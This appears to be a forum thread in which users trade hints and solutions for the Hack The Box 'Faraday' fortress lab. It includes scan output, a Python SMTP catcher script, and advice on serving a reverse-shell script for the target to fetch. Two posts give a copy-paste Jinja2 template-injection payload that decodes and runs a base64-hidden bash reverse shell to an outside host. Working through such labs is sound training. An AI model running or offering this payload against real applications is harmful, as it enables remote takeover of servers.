Return to forum

john2 · May 26, 2022 at 10:28 AM

hi guys
does anyone have anything useful regarding this fortress , totally stuck

fironeDerbert · July 28, 2022 at 4:35 PM

# HTB Fortress
## Faraday 
### Entrance 10.13.37.14 
```
└─$ ping 10.13.37.14                
PING 10.13.37.14 (10.13.37.14) 56(84) bytes of data.
64 bytes from 10.13.37.14: icmp_seq=1 ttl=63 time=76.2 ms
```
## Basic Nmap scan
```python
$nmap -v 10.13.37.14
Nmap scan report for 10.13.37.14
Host is up (0.082s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
8888/tcp open  sun-answerbook
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
```
## Port 8888
```python
└─$ nc -nv 10.13.37.14 8888                                                  
(UNKNOWN) [10.13.37.14] 8888 (?) open
Welcome to FaradaySEC stats!!!
Username: root
Password: root
access denied!!!
```
## Port 22
```
└─$ nc -nv 10.13.37.14 22                          
(UNKNOWN) [10.13.37.14] 22 (ssh) open
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
```
## Port 80

Creating a login for the Alert system 


The Server isn/t configured.... We can create a SMTP server with python to see if it connects. Putting in some bogus info for now.
Getting past the config we start to get some information about the computers and Users:


We can start to collect this information for wordlists.


It looks like the site is set up to send alerts through smtp so we can set up a SMTP server and save any emails we get to a file. 
https://stackoverflow.com/questions/2690965/a-simple-smtp-server-in-python
```python
from datetime import datetime
import asyncore
from smtpd import SMTPServer
class EmlServer(SMTPServer):
    no = 0
    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        filename = '%s-%d.eml' % (datetime.now().strftime('%Y%m%d%H%M%S'),
            self.no)
        print(filename)
        f = open(filename, 'wb')
        f.write(data)
        f.close
        print('%s saved.' % filename)
        self.no += 1
def run():
    EmlServer(('localhost', 25), None)
    try:
        asyncore.loop()
    except KeyboardInterrupt:
        pass
if __name__ == '__main__':
    run()
```
Once our server is up we can try and get the web app to send us an email.


Back on our machine we can see that we have an email saved to a file and get the first flag.

```bash
┌──(kali㉿kali)-[~/htb/Fortress-Machines/Faraday/smtpServer]
└─$ ls                                                                            
20211212170740-0.eml  smtpserver.py    
┌──(kali㉿kali)-[~/htb/Fortress-Machines/Faraday/smtpServer]
└─$ cat 20211212170740-0.eml          
Subject: asdf
An event was reported at JohnConnor:
asdf
Here is your gift FARADAY{REDACTED}
```

farkow · August 1, 2022 at 10:51 PM

Anybody can give some nudges for the following flags:
~~- Time to play~~
- Careful read
~~- Rootkit~~

The rest, I got it.

ThatUsername · August 2, 2022 at 8:50 PM

(August 1, 2022, 10:51 PM)farkow Wrote: Anybody can give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.

Do you have any hint on flag2 (let´s count)?
Found source code and tried some SSTI on many places but without any success. The "console.log" from the source isn´t really helping too :)

farkow · August 2, 2022 at 10:20 PM

(August 2, 2022, 08:50 PM)ThatUsername Wrote:
(August 1, 2022, 10:51 PM)farkow Wrote: Anybody can give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.

Do you have any hint on flag2 (let´s count)?
Found source code and tried some SSTI on many places but without any success. The "console.log" from the source isn´t really helping too :)

You are on right track! SSTI is the way to go.
I am sure you were trying to inject code in profile endpoint.
However, you need to escape it. {{ will not going to work. It is not complex, get a hint from hacktricks website.
To be on the safe side, put your reverse shell script on your server and serve, and curl the file in your injection.
Of course, you are going to need your session in cookies, too.
After the payload is delivered, send a post request to message endpoint
Prepare a python or go script that sends a payload to profile page.
And enjoy your reverse shell for the next steps.

fironeDerbert · August 5, 2022 at 4:18 PM

For flag 2 use this paylaod:

{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}

change the base64 payload with your IP

bodiesplus · September 3, 2022 at 12:14 AM

(August 1, 2022, 10:51 PM)farkow Wrote: Anybody can give some nudges for the following flags:
~~- Time to play~~
- Careful read
~~- Rootkit~~

The rest, I got it.

hey how did you bypass the ninvaders ?

sonofescobar1337 · September 3, 2022 at 12:16 AM

For flag 2 use this paylaod:

{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}

change the base64 payload with your IP

Enemigosss2 · October 1, 2022 at 9:26 AM

(August 1, 2022, 10:51 PM)farkow Wrote: Anybody can give some nudges for the following flags:
~~- Time to play~~
- Careful read
~~- Rootkit~~

The rest, I got it.

can you share?

Exa · October 2, 2022 at 1:15 PM

So far, I got 4 flags.Port 80: set up an SMTP receiverPort 80: .git + SSTI# intermediate stepRead out /app/db/database.dbIt contains 3 valid SSH loginsRead /var/mail/administrator, decode access.logNot sure if this was intended, but I used a polkit PE exploit. Perhaps port 8888 is the intended way.# Some ideas what to do next/usr/games/ninvaders/home/pasta/crackmePort 8888Rootkit?@farkowCan give you hints regarding Time to play + Rootkit?